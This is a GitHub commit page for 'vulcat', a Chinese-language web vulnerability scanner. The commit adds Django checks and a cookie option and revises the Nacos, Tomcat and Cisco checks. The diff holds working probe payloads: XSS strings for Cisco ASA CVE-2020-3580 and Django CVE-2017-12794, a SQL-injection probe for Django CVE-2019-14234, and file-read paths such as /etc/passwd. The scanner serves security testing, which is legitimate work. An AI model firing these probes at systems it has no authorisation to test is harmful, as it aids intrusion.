Skip to content

Commit

Permalink
20220412-v1.0.1
Browse files Browse the repository at this point in the history
  • Loading branch information
@CLincat
CLincat committed Apr 12, 2022
1 parent 4880bf8 commit 7d6a376
Show file tree
Hide file tree
Showing 15 changed files with 254 additions and 19 deletions.
7 changes: 5 additions & 2 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
# vulcat
除了代码写得有亿点点烂等亿点点小问题以外,还是阔以的......吧
除了代码写得有亿点点烂, 误报率有亿点点高, 等亿点点小问题以外,还是阔以的......吧

* vulcat可用于扫描web端漏洞(框架、中间件、CMS等), 发现漏洞时会提示目标url和payload, 使用者可以根据提示对漏洞进行手工验证<br/>
* 使用者还可以自己编写POC, 并添加到vulcat中进行扫描, 本项目也欢迎大家贡献自己的POC(白嫖)
Expand All @@ -19,10 +19,13 @@
+---------------+------------------+------------+----------+------------------------------------------------------------+
| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ApacheTomcat | CVE-2017-12615 | WriteFile | PUT | PUT方法任意文件写入 |
| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD软件跨站脚本攻击 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS漏洞 |
| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield sql注入漏洞 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Spring | CVE-2022-22965 | RCE | POST | Spring Framework远程代码执行 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
Expand Down
5 changes: 4 additions & 1 deletion README_en-us.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,10 +18,13 @@
+---------------+------------------+------------+----------+------------------------------------------------------------+
| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ApacheTomcat | CVE-2017-12615 | WriteFile | PUT | PUT方法任意文件写入 |
| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD软件跨站脚本攻击 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS漏洞 |
| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield sql注入漏洞 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Spring | CVE-2022-22965 | RCE | POST | Spring Framework远程代码执行 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
Expand Down
1 change: 1 addition & 0 deletions lib/core/coreScan.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@
from payloads.AlibabaNacos import nacos
from payloads.ApacheTomcat import tomcat
from payloads.Cisco import cisco
from payloads.Django import django
from payloads.ThinkPHP import thinkphp
# from payloads.Keycloak import keycloak
from payloads.Spring import spring
Expand Down
4 changes: 3 additions & 1 deletion lib/initial/config.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -49,13 +49,15 @@ def __init__(self, args):
'Accept': '*/*',
'Connection': 'close'
}
if args.cookie:
args.headers['Cookie'] = args.cookie

args.proxies = {
'http': args.http_proxy,
'https': args.http_proxy
}

app_list = ['alidruid', 'cisco', 'thinkphp', 'tomcat', 'nacos', 'spring', 'weblogic', 'yonyou']
app_list = ['alidruid', 'cisco', 'django', 'thinkphp', 'tomcat', 'nacos', 'spring', 'weblogic', 'yonyou']
if args.application == 'all': # * -a参数
args.app_list = app_list
else:
Expand Down
6 changes: 4 additions & 2 deletions lib/initial/language.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -28,6 +28,7 @@ def language():
'timeout': 'Timeout/s (default: 10)',
'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
'user_agent': 'Customize the User-Agent',
'cookie': 'Add a cookie',
'log': 'The log level, Optional 1-3 (default: 1)'
},
'application_help': {
Expand All @@ -48,7 +49,7 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
'name': 'AliDruid,cisco,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
'name': 'AliDruid,cisco,django,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
}
},
'zh_cn': {
Expand All @@ -67,6 +68,7 @@ def language():
'timeout': '超时时间/秒 (默认: 10)',
'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
'user_agent': '自定义User-Agent',
'cookie': '添加cookie',
'log': '日志等级, 可选1-3 (默认: 1)'
},
'application_help': {
Expand All @@ -87,7 +89,7 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
'name': 'AliDruid,cisco,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
'name': 'AliDruid,cisco,django,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
}
}
}
16 changes: 15 additions & 1 deletion lib/initial/list.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ def list():
'ApacheTomcat': [
{
'vul_id': 'CVE-2017-12615',
'type': 'WriteFile',
'type': 'FileUpload',
'method': 'PUT',
'description': 'PUT方法任意文件写入'
}
Expand All @@ -63,6 +63,20 @@ def list():
'description': '思科ASA/FTD软件跨站脚本攻击'
}
],
'Django': [
{
'vul_id': 'CVE-2017-12794',
'type': 'XSS',
'method': 'GET',
'description': 'Django debug page XSS跨站脚本攻击'
},
{
'vul_id': 'CVE-2019-14234',
'type': 'SQLinject',
'method': 'GET',
'description': 'Django JSONfield sql注入'
}
],
# 'Keycloak': [
# {
# 'vul_id': 'CVE-2020-10770',
Expand Down
3 changes: 2 additions & 1 deletion lib/initial/parse.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
''', version='vulcat.py-1.0.0\n')
''', version='vulcat.py-1.0.1\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
Expand All @@ -32,6 +32,7 @@ def parse():
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log'])

# * 指定目标类型
Expand Down
5 changes: 4 additions & 1 deletion payloads/AlibabaNacos.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,9 @@ def __init__(self):
]

def cve_2021_29441_scan(self, url):
''' 阿里巴巴Nacos未授权访问漏洞
可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'unAuthorized'
Expand Down Expand Up @@ -80,7 +83,7 @@ def cve_2021_29441_scan(self, url):
logger.logging(vul_info)
return None

if ('username' in res.text):
if (('pagesAvailable' in res.text) or ('"username":"nacos"' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
Expand Down
5 changes: 4 additions & 1 deletion payloads/ApacheTomcat.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -32,9 +32,12 @@ def __init__(self):
]

def cve_2017_12615_scan(self, url):
''' Tomcat PUT方法任意文件写入漏洞
PUT方法可用, 上传未做过滤, 可以写入任意文件
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'Write-File'
vul_info['vul_type'] = 'File-Upload'
vul_info['vul_id'] = 'CVE-2017-12615'
vul_info['vul_method'] = 'PUT'
vul_info['headers'] = {}
Expand Down
7 changes: 5 additions & 2 deletions payloads/Cisco.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -26,11 +26,14 @@ def __init__(self):
self.cve_2020_3580_payloads = [
{
'path': '+CSCOE+/saml/sp/acs?tgname=a',
'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dalert(\'{}\')%3e'.format(self.md)
'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dalert(\'{}\')%3e'.format('3580')
}
]

def cve_2020_3580_scan(self, url):
''' Cisco ASA设备/FTD设备 XSS跨站脚本攻击
反射型
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'XSS'
Expand Down Expand Up @@ -70,7 +73,7 @@ def cve_2020_3580_scan(self, url):
logger.logging(vul_info)
return None

if self.md in check.check_res(res.text, self.md):
if ("alert('3580')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
Expand Down
177 changes: 177 additions & 0 deletions payloads/Django.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,177 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-

'''
Django扫描类:
Django debug page XSS漏洞
CVE-2017-12794
Django JSONfield sql注入漏洞
CVE-2019-14234
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''

from lib.initial.config import config
from lib.tool.md5 import md5
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
from thirdparty import requests

class Django():
def __init__(self):
self.timeout = config.get('timeout')
self.headers = config.get('headers')
self.proxies = config.get('proxies')

self.app_name = 'Django'
self.md = md5(self.app_name)
self.cmd = 'echo ' + self.md

self.cve_2017_12794_payloads = [
{
'path': 'create_user/?username=<ScRiPt>prompt(\'12794\')</sCrIpt>',
'data': ''
}
]

self.cve_2019_14234_payloads = [
{
'path': 'admin/vuln/collection/?detail__a%27b=123',
'data': ''
},
{
'path': 'vuln/collection/?detail__a%27b=123',
'data': ''
}
]

def cve_2017_12794_scan(self, url):
'''Django debug page XSS漏洞
构造url创建新用户, 同时拼接xss语句, 得到已创建的提示;
此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'XSS'
vul_info['vul_id'] = 'CVE-2017-12794'
vul_info['vul_method'] = 'GET'
vul_info['headers'] = {}

headers = self.headers
headers.update(vul_info['headers'])

for payload in self.cve_2017_12794_payloads: # * Payload
path = payload['path'] # * Path
data = payload['data'] # * Data
target = url + path # * Target

vul_info['path'] = path
vul_info['data'] = data
vul_info['target'] = target

try:
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
# * 该XSS漏洞较奇怪, 需要请求2次, 2次的payload必须一模一样
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
except requests.ConnectTimeout:
vul_info['status_code'] = 'Timeout'
logger.logging(vul_info)
return None
except requests.ConnectionError:
vul_info['status_code'] = 'Faild'
logger.logging(vul_info)
return None

if ("prompt('12794')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
'Payload': {
'Url': url,
'Path': path
}
}
return results

def cve_2019_14234_scan(self, url):
''' Django JSONfield sql注入漏洞
需要登录, 并进入当前用户的目录下
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'SQLinject'
vul_info['vul_id'] = 'CVE-2019-14234'
vul_info['vul_method'] = 'GET'
vul_info['headers'] = {}

headers = self.headers
headers.update(vul_info['headers'])

for payload in self.cve_2019_14234_payloads: # * Payload
path = payload['path'] # * Path
data = payload['data'] # * Data
target = url + path # * Target

vul_info['path'] = path
vul_info['data'] = data
vul_info['target'] = target

try:
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
except requests.ConnectTimeout:
vul_info['status_code'] = 'Timeout'
logger.logging(vul_info)
return None
except requests.ConnectionError:
vul_info['status_code'] = 'Faild'
logger.logging(vul_info)
return None

if (('ProgrammingError' in res.text) or ('Request information' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
'Payload': {
'Url': url,
'Path': path
}
}
return results

def addscan(self, url):
return [
thread(target=self.cve_2017_12794_scan, url=url),
thread(target=self.cve_2019_14234_scan, url=url)
]

django = Django()
Loading

0 comments on commit 7d6a376

Please sign in to comment.